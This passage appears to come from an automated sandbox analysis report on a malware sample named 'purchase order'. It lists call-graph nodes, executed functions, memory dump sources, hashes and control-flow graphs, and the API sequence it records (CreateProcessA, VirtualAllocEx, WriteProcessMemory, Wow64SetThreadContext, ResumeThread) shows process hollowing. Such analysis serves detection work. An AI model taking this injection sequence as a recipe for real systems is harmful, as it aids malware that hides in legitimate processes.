42700->42702 42703 68e67f1 ResumeThread 42700->42703 42701->42644 42702->42700 42703->42700 42705 68e803c 42704->42705 42706 68e82cc 42705->42706 42707 68e67f8 ResumeThread 42705->42707 42708 68e67f1 ResumeThread 42705->42708 42706->42644 42707->42705 42708->42705 42710 68e7e5b 42709->42710 42711 68e7f79 42710->42711 42712 68e6cbc CreateProcessA 42710->42712 42713 68e6cc8 CreateProcessA 42710->42713 42711->42644 42712->42711 42713->42711 42715 68e832e 42714->42715 42717 68e6a38 WriteProcessMemory 42715->42717 42718 68e6a40 WriteProcessMemory 42715->42718 42716 68e8315 42717->42716 42718->42716 42720 68e8655 42719->42720 42721 68e803c 42719->42721 42723 68e68a8 Wow64SetThreadContext 42720->42723 42724 68e68a1 Wow64SetThreadContext 42720->42724 42722 68e82cc 42721->42722 42725 68e67f8 ResumeThread 42721->42725 42726 68e67f1 ResumeThread 42721->42726 42722->42644 42723->42721 42724->42721 42725->42721 42726->42721 42728 68e803c 42727->42728 42729 68e82cc 42728->42729 42730 68e67f8 ResumeThread 42728->42730 42731 68e67f1 ResumeThread 42728->42731 42729->42644 42729->42729 42730->42728 42731->42728 42733 68e8102 42732->42733 42735 68e6a38 WriteProcessMemory 42733->42735 42736 68e6a40 WriteProcessMemory 42733->42736 42734 68e8948 42735->42734 42736->42734 42738 68e89b8 42737->42738 42739 68e89db 42738->42739 42740 68e6b28 ReadProcessMemory 42738->42740 42741 68e6b30 ReadProcessMemory 42738->42741 42740->42739 42741->42739 42744 68e68a8 Wow64SetThreadContext 42742->42744 42745 68e68a1 Wow64SetThreadContext 42742->42745 42743 68e87d4 42744->42743 42745->42743 42747 68e6b2e ReadProcessMemory 42746->42747 42748 68e6aed 42746->42748 42750 68e6bbf 42747->42750 42748->42663 42750->42663 42752 68e6b7b ReadProcessMemory 42751->42752 42754 68e6bbf 42752->42754 42754->42663 42756 68e6a88 WriteProcessMemory 42755->42756 42758 68e6adf 42756->42758 42758->42668 42760 68e6a88 WriteProcessMemory 42759->42760 42762 68e6adf 42760->42762 42762->42668 42764 68e6d51 CreateProcessA 42763->42764 42766 68e6f13 42764->42766 42768 68e6d51 CreateProcessA 42767->42768 42770 68e6f13 42768->42770 42772 68e6838 ResumeThread 42771->42772 42774 68e6869 42772->42774 42774->42677 42776 68e67f8 ResumeThread 42775->42776 42778 68e6869 42776->42778 42778->42677 42780 68e68ed Wow64SetThreadContext 42779->42780 42782 68e6935 42780->42782 42782->42683 42784 68e68ed Wow64SetThreadContext 42783->42784 42786 68e6935 42784->42786 42786->42683 42788 68e6980 VirtualAllocEx 42787->42788 42790 68e69fd 42788->42790 42790->42687 42792 68e69c0 VirtualAllocEx 42791->42792 42794 68e69fd 42792->42794 42794->42687 42795 2354668 42796 235467a 42795->42796 42797 2354686 42796->42797 42799 2354778 42796->42799 42800 235479d 42799->42800 42804 2354878 42800->42804 42808 2354888 42800->42808 42805 23548af 42804->42805 42806 235498c 42805->42806 42812 23544b0 42805->42812 42810 23548af 42808->42810 42809 235498c 42809->42809 42810->42809 42811 23544b0 CreateActCtxA 42810->42811 42811->42809 42813 2355918 CreateActCtxA 42812->42813 42815 23559db 42813->42815

                                                                                                              Executed Functions

                                                                                                              Function 04AF52C8 Relevance: 17.0, Strings: 11, Instructions: 3230COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: (o^q$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$4|cq$4|cq$U$$^q
                                                                                                              • API String ID: 0-1576285732
                                                                                                              • Opcode ID: 74722978544665ead4ced87561c87dec89d7c9d82fadca019b5be4b389d7ee93
                                                                                                              • Instruction ID: d89934ead93879267ef7dfffe08abcf22e907b947688e83809835d2bc2e30afc
                                                                                                              • Opcode Fuzzy Hash: 74722978544665ead4ced87561c87dec89d7c9d82fadca019b5be4b389d7ee93
                                                                                                              • Instruction Fuzzy Hash: 7E631974A00219CFCB24DF69C888A9DB7B2FF88310F558599E519AB365DB34ED82CF50
                                                                                                              Function 02356F90 Relevance: 1.4, Strings: 1, Instructions: 185COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1839022658.0000000002350000.00000040.00000800.00020000.00000000.sdmp, Offset: 02350000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_2350000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: fcq
                                                                                                              • API String ID: 0-2768158334
                                                                                                              • Opcode ID: b38d590110915bb445fab468aef161ece5c205dc3bc4a44ea52491ddf826dad8
                                                                                                              • Instruction ID: 6ee65d1d1fc511911875e819b4cf6029af38be95646fa39706c2700dbc9fb045
                                                                                                              • Opcode Fuzzy Hash: b38d590110915bb445fab468aef161ece5c205dc3bc4a44ea52491ddf826dad8
                                                                                                              • Instruction Fuzzy Hash: 6081C574E01218DFDB08DFA9C994ADEBBB2FF88304F148529E409AB365DB359946CF50
                                                                                                              Function 02353E28 Relevance: 1.4, Strings: 1, Instructions: 181COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1839022658.0000000002350000.00000040.00000800.00020000.00000000.sdmp, Offset: 02350000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_2350000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: fcq
                                                                                                              • API String ID: 0-2768158334
                                                                                                              • Opcode ID: 359dc89e0a28d1558cc29ccba79c22848ad0a7e8a3d7bb2b188181bcef68566a
                                                                                                              • Instruction ID: 5ca23d9f486f750587d249d6ff6ca9733835d26646415ea72e6fc4c959e49e6b
                                                                                                              • Opcode Fuzzy Hash: 359dc89e0a28d1558cc29ccba79c22848ad0a7e8a3d7bb2b188181bcef68566a
                                                                                                              • Instruction Fuzzy Hash: BE81B574E002189FDB08DFA9C994ADEBBB2FF88304F148529D409AB365DB359946CF50
                                                                                                              Function 068E7E28 Relevance: .2, Instructions: 167COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1847035703.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_68e0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8841d05be58cff03406b0b970beb45bf87311f404fd513325316cf7923377aed
                                                                                                              • Instruction ID: a7064772f53f514a19632d4b8df1ca8915ad8935615a4829bf991c062c6354d2
                                                                                                              • Opcode Fuzzy Hash: 8841d05be58cff03406b0b970beb45bf87311f404fd513325316cf7923377aed
                                                                                                              • Instruction Fuzzy Hash: 07611471D04629CFEB68CF66C8457EDBBB6BF8A304F10C1AAD509A6250EB745A85CF40
                                                                                                              Function 04AFAD20 Relevance: 6.6, Strings: 5, Instructions: 329COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 1228 4afad20-4afad37 1230 4afad9a-4afada8 1228->1230 1231 4afad39-4afad48 1228->1231 1234 4afadbb-4afadbd 1230->1234 1235 4afadaa-4afadb5 call 4af9db8 1230->1235 1231->1230 1236 4afad4a-4afad56 call 4af9e64 1231->1236 1333 4afadbf call 4afacf0 1234->1333 1334 4afadbf call 4afad20 1234->1334 1235->1234 1242 4afae7a-4afaef2 1235->1242 1243 4afad6a-4afad86 1236->1243 1244 4afad58-4afad64 call 4af9e74 1236->1244 1241 4afadc5-4afadd4 1247 4afadec-4afadef 1241->1247 1248 4afadd6-4afade7 call 4af9e84 1241->1248 1275 4afaefb-4afaf05 1242->1275 1276 4afaef4-4afaefa 1242->1276 1257 4afad8c-4afad90 1243->1257 1258 4afae35-4afae73 1243->1258 1244->1243 1252 4afadf0-4afae2e 1244->1252 1248->1247 1252->1258 1257->1230 1258->1242 1278 4afaf0b-4afaf24 call 4af9eac * 2 1275->1278 1279 4afb141-4afb16d 1275->1279 1286 4afaf2a-4afaf4c 1278->1286 1287 4afb174-4afb199 1278->1287 1279->1287 1294 4afaf4e-4afaf5c call 4af9e84 1286->1294 1295 4afaf5d-4afaf6c 1286->1295 1302 4afb19c-4afb1b0 1287->1302 1300 4afaf6e-4afaf8b 1295->1300 1301 4afaf91-4afafb2 1295->1301 1300->1301 1309 4afafb4-4afafc5 1301->1309 1310 4afb002-4afb02a 1301->1310 1306 4afb1b2-4afb1cd 1302->1306 1313 4afafc7-4afafdf call 4af9ebc 1309->1313 1314 4afaff4-4afaff8 1309->1314 1335 4afb02d call 4afb400 1310->1335 1336 4afb02d call 4afb410 1310->1336 1321 4afafe4-4afaff2 1313->1321 1322 4afafe1-4afafe2 1313->1322 1314->1310 1317 4afb030-4afb055 1324 4afb09b 1317->1324 1325 4afb057-4afb06c 1317->1325 1321->1313 1321->1314 1322->1321 1324->1279 1325->1324 1328 4afb06e-4afb091 1325->1328 1328->1324 1332 4afb093 1328->1332 1332->1324 1333->1241 1334->1241 1335->1317 1336->1317
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Hbq$Hbq$Hbq$Hbq$Hbq
                                                                                                              • API String ID: 0-1677660839
                                                                                                              • Opcode ID: 8cf415989cfaff481a0cf5bbd947e054a13675f01e2ff3836ab43f33ed036359
                                                                                                              • Instruction ID: e8c93c0113d5e6cb273f11f2b1e229a3e27fe1f66b1c7a53aa7d4e31a9918529
                                                                                                              • Opcode Fuzzy Hash: 8cf415989cfaff481a0cf5bbd947e054a13675f01e2ff3836ab43f33ed036359
                                                                                                              • Instruction Fuzzy Hash: 51C15B347006148FDB15EBB8C9549AE77F6EFC9350B244469E906AB3A0DF39EC02CB65
                                                                                                              Function 04AFC9A8 Relevance: 2.7, Strings: 2, Instructions: 216COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 1359 4afc9a8-4afca0a call 4afb948 1365 4afca0c-4afca0e 1359->1365 1366 4afca70-4afca9c 1359->1366 1367 4afca14-4afca20 1365->1367 1368 4afcaa3-4afcaab 1365->1368 1366->1368 1373 4afca26-4afca61 call 4afb954 1367->1373 1374 4afcab2-4afcbed 1367->1374 1368->1374 1384 4afca66-4afca6f 1373->1384 1391 4afcbf3-4afcc01 1374->1391 1392 4afcc0a-4afcc50 1391->1392 1393 4afcc03-4afcc09 1391->1393 1398 4afcc5d 1392->1398 1399 4afcc52-4afcc55 1392->1399 1393->1392 1400 4afcc5e 1398->1400 1399->1398 1400->1400
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Hbq$Hbq
                                                                                                              • API String ID: 0-4258043069
                                                                                                              • Opcode ID: ee9e7dcf4797124f370879e0388065595bcca20feb871b8fe6d2cf4dfce66881
                                                                                                              • Instruction ID: edcd06f08e802a35f422984cc7c011136a672628f57d507e64d5d6ee8735d52c
                                                                                                              • Opcode Fuzzy Hash: ee9e7dcf4797124f370879e0388065595bcca20feb871b8fe6d2cf4dfce66881
                                                                                                              • Instruction Fuzzy Hash: 0A816D70E002199FDB14DFA9C8846EEBBF6FF89310F14852AE409EB351DB349906CB91
                                                                                                              Function 04AF1B60 Relevance: 2.6, Strings: 2, Instructions: 85COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 1478 4af1b60-4af1ba8 call 4af1004 1482 4af1bad-4af1baf 1478->1482 1483 4af1c28-4af1c38 1482->1483 1484 4af1bb1-4af1bf0 1482->1484 1489 4af1c5a-4af1c60 1483->1489 1490 4af1c3a-4af1c58 1483->1490 1494 4af1bf2-4af1c1b 1484->1494 1495 4af1c21-4af1c27 1484->1495 1490->1489 1494->1495
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844520172.0000000004AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4af0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 3$gl
                                                                                                              • API String ID: 0-3870923017
                                                                                                              • Opcode ID: dbe8da4509d670569d168a29b22211da4ddd0ea66f0b87a7a99c1723ea3267e7
                                                                                                              • Instruction ID: d096e3c1f642cbda6c04c661b2ea105c6873fccd64f55b2b8660eebd63448231
                                                                                                              • Opcode Fuzzy Hash: dbe8da4509d670569d168a29b22211da4ddd0ea66f0b87a7a99c1723ea3267e7
                                                                                                              • Instruction Fuzzy Hash: E83127706043808FC701EB78D4495DEBFE6EF81314B1488ADE54A9B392EB74EC0ACB91
                                                                                                              Function 068E6CBC Relevance: 1.7, APIs: 1, Instructions: 247processCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 2024 68e6cbc-68e6d5d 2026 68e6d5f-68e6d69 2024->2026 2027 68e6d96-68e6db6 2024->2027 2026->2027 2028 68e6d6b-68e6d6d 2026->2028 2032 68e6def-68e6e1e 2027->2032 2033 68e6db8-68e6dc2 2027->2033 2030 68e6d6f-68e6d79 2028->2030 2031 68e6d90-68e6d93 2028->2031 2034 68e6d7d-68e6d8c 2030->2034 2035 68e6d7b 2030->2035 2031->2027 2043 68e6e57-68e6f11 CreateProcessA 2032->2043 2044 68e6e20-68e6e2a 2032->2044 2033->2032 2036 68e6dc4-68e6dc6 2033->2036 2034->2034 2037 68e6d8e 2034->2037 2035->2034 2038 68e6dc8-68e6dd2 2036->2038 2039 68e6de9-68e6dec 2036->2039 2037->2031 2041 68e6dd6-68e6de5 2038->2041 2042 68e6dd4 2038->2042 2039->2032 2041->2041 2045 68e6de7 2041->2045 2042->2041 2055 68e6f1a-68e6fa0 2043->2055 2056 68e6f13-68e6f19 2043->2056 2044->2043 2046 68e6e2c-68e6e2e 2044->2046 2045->2039 2047 68e6e30-68e6e3a 2046->2047 2048 68e6e51-68e6e54 2046->2048 2050 68e6e3e-68e6e4d 2047->2050 2051 68e6e3c 2047->2051 2048->2043 2050->2050 2052 68e6e4f 2050->2052 2051->2050 2052->2048 2066 68e6fa2-68e6fa6 2055->2066 2067 68e6fb0-68e6fb4 2055->2067 2056->2055 2066->2067 2068 68e6fa8 2066->2068 2069 68e6fb6-68e6fba 2067->2069 2070 68e6fc4-68e6fc8 2067->2070 2068->2067 2069->2070 2071 68e6fbc 2069->2071 2072 68e6fca-68e6fce 2070->2072 2073 68e6fd8-68e6fdc 2070->2073 2071->2070 2072->2073 2076 68e6fd0 2072->2076 2074 68e6fee-68e6ff5 2073->2074 2075 68e6fde-68e6fe4 2073->2075 2077 68e700c 2074->2077 2078 68e6ff7-68e7006 2074->2078 2075->2074 2076->2073 2080 68e700d 2077->2080 2078->2077 2080->2080
                                                                                                              APIs
                                                                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 068E6EFE
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1847035703.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_68e0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateProcess
                                                                                                              • String ID:
                                                                                                              • API String ID: 963392458-0
                                                                                                              • Opcode ID: 63ef1cc75bbdf1199acb7eea0c3a83d30edaed27c9ac9ef3c0375dff0fb3fd9c
                                                                                                              • Instruction ID: d831dee3f348e071e50964fff075b800038f79cbd463d6391941bab92d9c54af
                                                                                                              • Opcode Fuzzy Hash: 63ef1cc75bbdf1199acb7eea0c3a83d30edaed27c9ac9ef3c0375dff0fb3fd9c
                                                                                                              • Instruction Fuzzy Hash: C3A17B71D00219DFDB60CFA8C840BDDBBB2BF59314F1485A9E818E7290EB759985CF92
                                                                                                              Function 068E6CC8 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 2244 68e6cc8-68e6d5d 2246 68e6d5f-68e6d69 2244->2246 2247 68e6d96-68e6db6 2244->2247 2246->2247 2248 68e6d6b-68e6d6d 2246->2248 2252 68e6def-68e6e1e 2247->2252 2253 68e6db8-68e6dc2 2247->2253 2250 68e6d6f-68e6d79 2248->2250 2251 68e6d90-68e6d93 2248->2251 2254 68e6d7d-68e6d8c 2250->2254 2255 68e6d7b 2250->2255 2251->2247 2263 68e6e57-68e6f11 CreateProcessA 2252->2263 2264 68e6e20-68e6e2a 2252->2264 2253->2252 2256 68e6dc4-68e6dc6 2253->2256 2254->2254 2257 68e6d8e 2254->2257 2255->2254 2258 68e6dc8-68e6dd2 2256->2258 2259 68e6de9-68e6dec 2256->2259 2257->2251 2261 68e6dd6-68e6de5 2258->2261 2262 68e6dd4 2258->2262 2259->2252 2261->2261 2265 68e6de7 2261->2265 2262->2261 2275 68e6f1a-68e6fa0 2263->2275 2276 68e6f13-68e6f19 2263->2276 2264->2263 2266 68e6e2c-68e6e2e 2264->2266 2265->2259 2267 68e6e30-68e6e3a 2266->2267 2268 68e6e51-68e6e54 2266->2268 2270 68e6e3e-68e6e4d 2267->2270 2271 68e6e3c 2267->2271 2268->2263 2270->2270 2272 68e6e4f 2270->2272 2271->2270 2272->2268 2286 68e6fa2-68e6fa6 2275->2286 2287 68e6fb0-68e6fb4 2275->2287 2276->2275 2286->2287 2288 68e6fa8 2286->2288 2289 68e6fb6-68e6fba 2287->2289 2290 68e6fc4-68e6fc8 2287->2290 2288->2287 2289->2290 2291 68e6fbc 2289->2291 2292 68e6fca-68e6fce 2290->2292 2293 68e6fd8-68e6fdc 2290->2293 2291->2290 2292->2293 2296 68e6fd0 2292->2296 2294 68e6fee-68e6ff5 2293->2294 2295 68e6fde-68e6fe4 2293->2295 2297 68e700c 2294->2297 2298 68e6ff7-68e7006 2294->2298 2295->2294 2296->2293 2300 68e700d 2297->2300 2298->2297 2300->2300
                                                                                                              APIs
                                                                                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 068E6EFE
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1847035703.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_68e0000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateProcess
                                                                                                              • String ID:
                                                                                                              • API String ID: 963392458-0
                                                                                                              • Opcode ID: 2f24c136d4c8a7522a182e46531ff52ae007fc08deed97fadeb67f1acd846956
                                                                                                              • Instruction ID: e93e1ed77cd4cf198ba4ffb12ed40d2c64b1c7224df38ef63b1a6af91dc13971
                                                                                                              • Opcode Fuzzy Hash: 2f24c136d4c8a7522a182e46531ff52ae007fc08deed97fadeb67f1acd846956
                                                                                                              • Instruction Fuzzy Hash: F8918B71D00219DFDB60CF68C840BEDBBB2BF59314F1485A9E818E7290EB759985CF92
                                                                                                              Function 0235B1C8 Relevance: 1.7, APIs: 1, Instructions: 194COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 2454 235b1c8-235b1d7 2455 235b203-235b207 2454->2455 2456 235b1d9-235b1e6 call 2359c38 2454->2456 2458 235b209-235b213 2455->2458 2459 235b21b-235b25c 2455->2459 2461 235b1fc 2456->2461 2462 235b1e8 2456->2462 2458->2459 2465 235b25e-235b266 2459->2465 2466 235b269-235b277 2459->2466 2461->2455 2510 235b1ee call 235b460 2462->2510 2511 235b1ee call 235b450 2462->2511 2465->2466 2467 235b279-235b27e 2466->2467 2468 235b29b-235b29d 2466->2468 2470 235b280-235b287 call 235ae80 2467->2470 2471 235b289 2467->2471 2472 235b2a0-235b2a7 2468->2472 2469 235b1f4-235b1f6 2469->2461 2473 235b338-235b3f8 2469->2473 2474 235b28b-235b299 2470->2474 2471->2474 2476 235b2b4-235b2bb 2472->2476 2477 235b2a9-235b2b1 2472->2477 2505 235b400-235b42b GetModuleHandleW 2473->2505 2506 235b3fa-235b3fd 2473->2506 2474->2472 2479 235b2bd-235b2c5 2476->2479 2480 235b2c8-235b2d1 call 235ae90 2476->2480 2477->2476 2479->2480 2485 235b2d3-235b2db 2480->2485 2486 235b2de-235b2e3 2480->2486 2485->2486 2488 235b2e5-235b2ec 2486->2488 2489 235b301-235b30e 2486->2489 2488->2489 2490 235b2ee-235b2fe call 235aea0 call 235aeb0 2488->2490 2495 235b331-235b337 2489->2495 2496 235b310-235b32e 2489->2496 2490->2489 2496->2495 2507 235b434-235b448 2505->2507 2508 235b42d-235b433 2505->2508 2506->2505 2508->2507 2510->2469 2511->2469
                                                                                                              APIs
                                                                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 0235B41E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1839022658.0000000002350000.00000040.00000800.00020000.00000000.sdmp, Offset: 02350000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_2350000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: HandleModule
                                                                                                              • String ID:
                                                                                                              • API String ID: 4139908857-0
                                                                                                              • Opcode ID: ca41c4e30c2dacff8ec658925ff140ce03e688e60b00368d2c0dc9bf6ea78638
                                                                                                              • Instruction ID: 3ed5d13b460aa90698f18fae55cbce804c1aad3b28a299fa01e645b0342c62af
                                                                                                              • Opcode Fuzzy Hash: ca41c4e30c2dacff8ec658925ff140ce03e688e60b00368d2c0dc9bf6ea78638
                                                                                                              • Instruction Fuzzy Hash: 0A712470A00B158FD724DF69D144B5ABBF2BF88308F008A2DD88AD7A54DB75E949CB90
                                                                                                              Function 0235B098 Relevance: 1.6, APIs: 1, Instructions: 126COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 2512 235b098 2513 235b099-235b09b 2512->2513 2514 235b10d-235b11f 2513->2514 2515 235b09d-235b0ae 2513->2515 2519 235b124-235b125 2514->2519 2515->2513 2518 235b0b0-235b0b2 2515->2518 2518->2519 2520 235b0b4-235b0bb 2518->2520 2522 235b197-235b1a2 2519->2522 2523 235b127-235b12e 2519->2523 2521 235d6a8-235d73c DuplicateHandle 2520->2521 2524 235d745-235d762 2521->2524 2525 235d73e-235d744 2521->2525 2526 235b1af-235b1b4 2522->2526 2527 235b130-235b13b 2523->2527 2528 235b13d-235b145 2523->2528 2525->2524 2526->2521 2529 235b148-235b151 2527->2529 2528->2529 2529->2522 2532 235b153-235b157 2529->2532 2533 235b18e-235b195 2532->2533 2534 235b159-235b186 2532->2534 2533->2522 2535 235b1a4-235b1ac 2533->2535 2534->2533 2535->2526
                                                                                                              APIs
                                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0235D66E,?,?,?,?,?), ref: 0235D72F
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1839022658.0000000002350000.00000040.00000800.00020000.00000000.sdmp, Offset: 02350000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_2350000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DuplicateHandle
                                                                                                              • String ID:
                                                                                                              • API String ID: 3793708945-0
                                                                                                              • Opcode ID: 4ef8f8ed30d1a968523424f6fd6534635ab3527d7509110ae0ff770c96237408
                                                                                                              • Instruction ID: 6af90d8f0128c395d14071d842a77ea89973eceb73fb22f71ea85c7bea4dbc91
                                                                                                              • Opcode Fuzzy Hash: 4ef8f8ed30d1a968523424f6fd6534635ab3527d7509110ae0ff770c96237408
                                                                                                              • Instruction Fuzzy Hash: 7F41BBB09003589FEB11CF68C844B9EBFF5FF44318F04456AE858AB261C375E946CBA0
                                                                                                              Function 04A11264 Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 2538 4a11264-4a142fc 2541 4a14302-4a14307 2538->2541 2542 4a143ac-4a143cc call 4a1113c 2538->2542 2543 4a14309-4a14340 2541->2543 2544 4a1435a-4a14392 CallWindowProcW 2541->2544 2549 4a143cf-4a143dc 2542->2549 2552 4a14342-4a14348 2543->2552 2553 4a14349-4a14358 2543->2553 2546 4a14394-4a1439a 2544->2546 2547 4a1439b-4a143aa 2544->2547 2546->2547 2547->2549 2552->2553 2553->2549
                                                                                                              APIs
                                                                                                              • CallWindowProcW.USER32(?,?,?,?,?), ref: 04A14381
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1844040022.0000000004A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A10000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_4a10000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CallProcWindow
                                                                                                              • String ID:
                                                                                                              • API String ID: 2714655100-0
                                                                                                              • Opcode ID: 40234edff127b7e2e8eecd0768c8cac46e30068cfa03eae49477858773b8249c
                                                                                                              • Instruction ID: f30f031d6855854a195d92c303f0094626566f51a9bf09b290d6754a323e9817
                                                                                                              • Opcode Fuzzy Hash: 40234edff127b7e2e8eecd0768c8cac46e30068cfa03eae49477858773b8249c
                                                                                                              • Instruction Fuzzy Hash: 0B4126B4A00309DFDB14CF99C488AAABBF5FB88314F25C459D519AB321D734A841CFA1
                                                                                                              Function 023544B0 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 2555 23544b0-23559d9 CreateActCtxA 2558 23559e2-2355a3c 2555->2558 2559 23559db-23559e1 2555->2559 2566 2355a3e-2355a41 2558->2566 2567 2355a4b-2355a4f 2558->2567 2559->2558 2566->2567 2568 2355a51-2355a5d 2567->2568 2569 2355a60 2567->2569 2568->2569 2571 2355a61 2569->2571 2571->2571
                                                                                                              APIs
                                                                                                              • CreateActCtxA.KERNEL32(?), ref: 023559C9
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1839022658.0000000002350000.00000040.00000800.00020000.00000000.sdmp, Offset: 02350000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_2350000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Create
                                                                                                              • String ID:
                                                                                                              • API String ID: 2289755597-0
                                                                                                              • Opcode ID: 485431fc75b629fd3b4f4ee1284a7b3e1fab548d31cfdd686e45bfbd9f1188b5
                                                                                                              • Instruction ID: 923e5a935da3e1fa825050759bbc248b99dba55ac180a5d5c5f1335c922f5829
                                                                                                              • Opcode Fuzzy Hash: 485431fc75b629fd3b4f4ee1284a7b3e1fab548d31cfdd686e45bfbd9f1188b5
                                                                                                              • Instruction Fuzzy Hash: 4B41F2B0C0072DCBDB24DFA9C984B8EBBF5BF49304F60806AE408AB251DB756945CF90
                                                                                                              Function 0235590C Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                              Download Yara Rule

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 2572 235590c-23559d9 CreateActCtxA 2574 23559e2-2355a3c 2572->2574 2575 23559db-23559e1 2572->2575 2582 2355a3e-2355a41 2574->2582 2583 2355a4b-2355a4f 2574->2583 2575->2574 2582->2583 2584 2355a51-2355a5d 2583->2584 2585 2355a60 2583->2585 2584->2585 2587 2355a61 2585->2587 2587->2587
                                                                                                              APIs
                                                                                                              • CreateActCtxA.KERNEL32(?), ref: 023559C9
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.1839022658.0000000002350000.00000040.00000800.00020000.00000000.sdmp, Offset: 02350000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
